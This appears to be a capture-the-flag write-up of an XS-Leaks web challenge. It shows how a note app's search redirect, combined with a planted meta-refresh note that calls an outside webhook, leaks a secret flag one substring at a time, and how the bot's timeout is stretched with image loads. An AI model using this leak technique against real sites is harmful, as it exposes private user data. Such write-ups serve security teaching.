- Create a note with meta redirect tag to get callback.
- Leak the flag using search functionality.
I was confused and didn’t know what’s the approproate name for this website :( However just a typical note keeper website \o/ Enjoy the ride :)
This was an interesting XS-Leaks challenge from Securinets CTF qualfiiers, which had the least number of solves among web challenges.
In this challenge, we were given a note creating app and there was a search functionality where we can search note content. This seemed like a place to look for bugs like XS-Leaks.
The source code for search endpoint is given below.
The following happens when a request is made to
queryargument is split based on
- First part of
queryis the note content which will be searched in current user’s note.
- The second part of
queryis a note id, to which the user will be redirected to when a note which matches the search is found.
Thus, the query argument takes the following format.
<meta http-equiv="Content-Security-Policy" content="default-src 'self';object-src 'none'">
To exploit, we can use the
/search endpoint. We check if there’s any note that contains a particular string and if present, we redirect to a note that contains an HTML code that can give the webhook server a callback.
This can be done using a
<meta> refresh tag.
<meta http-equiv="refresh" content="0;url=http://site/webhook">
However, there was a timeout which limits the time that bot stays in the given URL.
waitUntil: 'networkidle0' means the bot will wait until there is no network connection for at least 500ms. So, it is possible to we can load a image which will delay the timeout.
- Client-Side Exploit
- Webhook Server
from flask import Flask,request,render_template,session,redirect
With the above exploit, whenever a note that matches a substring of the flag, the bot gets redirected to a webhook server.
There were many interesting solutions for this challenge like abuse the redirect in the search with fetch redirect limit. Solving this challenge was fun and learnt a lot with it.